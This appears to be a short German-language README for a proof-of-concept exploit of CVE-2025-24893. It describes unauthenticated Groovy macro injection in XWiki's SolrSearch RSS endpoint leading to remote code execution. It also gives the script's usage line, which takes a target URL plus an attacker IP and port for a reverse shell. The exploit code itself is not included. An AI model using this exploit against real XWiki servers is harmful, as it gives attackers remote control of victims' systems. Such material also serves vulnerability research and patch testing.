
Reverse Shell Payload for CVE-2025-24893
PoC für CVE-2025-24893 – XWiki
<groovy>-Makro-Remotecodeausführung
Inspiriert von Artemirs ursprünglichem PoC
Dies ist ein Proof-of-Concept (PoC)-Exploit für CVE-2025-24893, eine Schwachstelle zur Remotecodeausführung (RCE) in anfälligen Versionen von XWiki.
Der Fehler liegt in der unzureichenden Bereinigung von Benutzereingaben im SolrSearch-Endpunkt, der anfällig für nicht-sandboxierte <groovy>-Makro-Injektion über eine RSS-Feed-Abfrage ist.
Dieses Skript injiziert eine Groovy-Nutzlast unter Verwendung des async-Makros, was zu Befehlsausführung auf dem Server führt und einem Angreifer ermöglicht, eine Reverse Shell zurück zu seinem System auszulösen.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>